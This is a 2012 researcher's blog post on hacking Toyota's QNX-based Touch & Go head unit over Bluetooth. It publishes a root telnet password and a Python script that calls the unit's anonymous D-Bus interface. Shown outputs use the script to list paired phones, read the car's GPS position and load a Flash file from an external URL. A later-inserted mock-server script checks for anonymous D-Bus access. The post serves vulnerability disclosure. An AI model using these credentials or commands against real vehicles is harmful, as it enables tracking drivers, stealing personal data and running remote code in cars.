
Hacking Toyota touch and go

05 Mar 2012 . category: Hacking .
#hacking #reverseengineering #vulnerability

Toyota Touch & Go

Raw notes

Intro

New Toyotas have a head unit called Touch & Go. The system is based on QNX and made by Harman, and most likely the same kind of devices are used by other car manufacturers as well. You can connect the car to the Internet via Bluetooth. We joined the same Bluetooth network to see what was going on.

There were multiple services running on QNX, including Telnet, D-Bus with anonymous login enabled, and some log interfaces for debugging.

Telnet

$ telnet 172.20.10.6
Trying 172.20.10.6...
Connected to 172.20.10.6.
Escape character is '^]'.


QNX Neutrino (localhost) (ttyp0)

login: 

The accounts are now publicly known: Harman was kind enough to share the account information with everybody on their Scrum wiki.

login: root
password: Mc!AsR3

D-Bus

D-Bus is used for the internal communication of the device. Because QNX does not support Unix domain sockets, the developer decided to use a TCP socket. Back in the day he assumed this device was never going to be on the Internet and decided to run it in anonymous mode. That means you do not have to do any authentication to use it remotely.
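Whether a D-Bus TCP listener really accepts anonymous clients can be verified with nothing more than the SASL handshake from the D-Bus specification: the client sends a NUL byte and AUTH ANONYMOUS, and the server answers OK or REJECTED. The following is an added example, not code from the original post; it embeds a constructed in-process stand-in for the bus so it runs offline, and the host, port and GUID values are made up.

```python
import socket
import threading

def anonymous_auth_accepted(host, port, timeout=3.0):
    """Perform only the D-Bus SASL step and report whether the endpoint
    accepts AUTH ANONYMOUS. Per the D-Bus spec the client sends a NUL byte
    followed by "AUTH <mech>" and CRLF; the server replies "OK <guid>" or
    "REJECTED <mechanisms>" (CRLF-terminated). A hardened bus says REJECTED."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"\0AUTH ANONYMOUS\r\n")
        reply = b""
        while not reply.endswith(b"\r\n"):
            chunk = s.recv(256)
            if not chunk:
                break
            reply += chunk
        # Close without sending BEGIN, so no message exchange ever starts.
        return reply.startswith(b"OK ")

def _mock_dbus_server(allow_anonymous):
    """Constructed stand-in for the head unit's bus (not a real dbus-daemon):
    answers the handshake the way a daemon with or without anonymous
    authentication would. Returns the port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            data = conn.recv(256)
            if allow_anonymous and data.startswith(b"\0AUTH ANONYMOUS"):
                conn.sendall(b"OK 0123456789abcdef0123456789abcdef\r\n")  # made-up GUID
            else:
                conn.sendall(b"REJECTED EXTERNAL DBUS_COOKIE_SHA1\r\n")
            conn.recv(256)  # wait for the client to hang up
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def check_local_demo():
    """Weak (anonymous) bus vs. hardened bus: expected (True, False)."""
    weak = anonymous_auth_accepted("127.0.0.1", _mock_dbus_server(True))
    hardened = anonymous_auth_accepted("127.0.0.1", _mock_dbus_server(False))
    return weak, hardened

if __name__ == "__main__":
    print(check_local_demo())
```

Pointed at a real bus address, the same function tells you whether anonymous authentication is still enabled after a fix has supposedly been deployed.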

We made a simple script for testing purposes. Here are a couple of examples:

import sys
import dbus

def main(service, method, args):
    # The head unit exposes its bus over plain TCP with anonymous
    # authentication, so no credentials are needed to connect.
    bus = dbus.bus.BusConnection("tcp:host=192.168.2.3,port=6667")
    # The object path is derived from the service name, e.g.
    # com.harman.service.Navigation -> /com/harman/service/Navigation
    p = bus.get_object(service, "/" + service.replace(".", "/"))
    i = dbus.Interface(p, dbus_interface="com.harman.ServiceIpc")
    print("calling %s(%s)" % (method, args))
    print(i.Invoke(method, args))

if __name__ == "__main__":
    # usage: toyota.py <service> <method> <json-args>
    main(*sys.argv[1:])

Using that we were able to:

1. Get the list of paired Bluetooth devices:

machine% python toyota.py com.harman.service.BluetoothService getPairedDeviceList ''
{"pairedDeviceList":[{"serviceSearchList":[{"service":"A2DP_SOURCE","priority":0,"connected":false},{"service":"HFPGW","priority":1,"connected":true},{"service":"HSPGW","priority":0,"connected":false},{"service":"0000-1203-0000-1000-8000-0080-5F9B-34FB","priority":0,"connected":false},{"service":"PAN_NAP","priority":0,"connected":true},{"service":"AVRCP","priority":0,"connected":false},{"service":"SPP","priority":0,"connected":false},{"service":"PAN_GN","priority":0,"connected":false},{"service":"SDP","priority":0,"connected":false}],"name":"cn0011","address":"xx:xx:xx:xx:xx:xx"},{"serviceSearchList":[{"service":"HFPGW","priority":2,"connected":false},{"service":"A2DP_SOURCE","priority":0,"connected":false},{"service":"DID","priority":0,"connected":false},{"service":"AVRCP","priority":0,"connected":false},{"service":"0000-1203-0000-1000-8000-0080-5F9B-34FB","priority":0,"connected":false},{"service":"HSPGW","priority":0,"connected":false},{"service":"OPP_SERVER","priority":0,"connected":false},{"service":"PBAP_SERVER","priority":0,"connected":false},{"service":"SDP","priority":0,"connected":false}],"name":"ZTE-BLADE","address":"xx:xx:xx:xx:xx:xx"},{"serviceSearchList":[{"service":"HFPGW","priority":3,"connected":false},{"service":"A2DP_SOURCE","priority":0,"connected":false},{"service":"PAN_NAP","priority":0,"connected":false},{"service":"OPP_SERVER","priority":0,"connected":false},{"service":"FTP","priority":0,"connected":false},{"service":"DUNGW","priority":0,"connected":false},{"service":"0000-1201-0000-1000-8000-0080-5F9B-34FB","priority":0,"connected":false},{"service":"SPP","priority":0,"connected":false},{"service":"0000-1203-0000-1000-8000-0080-5F9B-34FB","priority":0,"connected":false},{"service":"HSPGW","priority":0,"connected":false},{"service":"SyncMLClient","priority":0,"connected":false},{"service":"PBAP_SERVER","priority":0,"connected":false},{"service":"SAP","priority":0,"connected":false},{"service":"0000-1204-0000-1000-8000-0080-5F9B-34FB","priority":0,"connected":false},{"service":"AVRCP","priority":0,"connected":false},{"service":"SDP","priority":0,"connected":false},{"service":"FBUS_RFCOMM","priority":0,"connected":false}],"name":"Nokia X3-02","address":"xx:xx:xx:xx:xx:xx"}],"description":"success","code":0}

2. Get the car's GPS position:

machine% python toyota-cmd.py com.harman.service.Navigation MAP_PositionInfo ''
calling MAP_PositionInfo()
{"lat":65.06096196174622,"lon":25.44586372375488,"posInfo":null}

3. Load any Flash (SWF) application from the Internet:

machine% python toyota-cmd.py com.harman.service.HMIService loadExternalSWF '{ "path":"http://www.sieni.us/H4X/29.swf" }'
calling loadExternalSWF({ "path":"http://www.sieni.us/H4X/29.swf" })
{"result":true}

Here is the first success with loadExternalSWF.

I was so excited about the success that I stopped recording by mistake. :)

We reported this vulnerability to Toyota and they thought it was not a problem because you need to use Bluetooth to get into the system.

Edit (2015): The same vulnerability was used in the famous Jeep hack. It seems it really was a problem.

Go and check our raw notes from the wiki if you are interested in the dirty details. Raw notes


Me

Feel free to contact me for more info or just to give feedback. e-mail: mikko.kenttala(ä)gmail.com IRC: turmio@IRCnet